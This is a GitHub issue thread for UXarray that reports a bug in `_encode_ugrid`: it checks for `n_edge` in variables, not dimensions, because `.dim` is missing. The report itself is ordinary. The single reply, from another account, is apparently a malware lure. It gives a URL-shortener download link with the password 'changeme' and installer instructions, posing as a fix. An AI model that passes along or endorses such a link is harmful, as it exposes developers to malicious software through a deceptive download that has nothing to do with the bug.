### ISSUE TITLE
Missing dims in `_encode_ugrid`

### ISSUE THREAD

**Issue by kjnam** [UXARRAY/uxarray#906]
### Version

v2024.07.1

### How did you install UXarray?

Conda

### What happened?

`_encode_ugrid` tries to check if `n_edge` exists in the dimensions, but it is missing `.dim`. So, it fails to check it correctly. See the line below:
https://github.com/UXARRAY/uxarray/blob/68a6fa520c163adb3c307b20382b21bc22f7ed6a/uxarray/io/_ugrid.py#L92-L93

### What did you expect to happen?

The code should check if `n_edge` exists in dimensions not in variables.

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
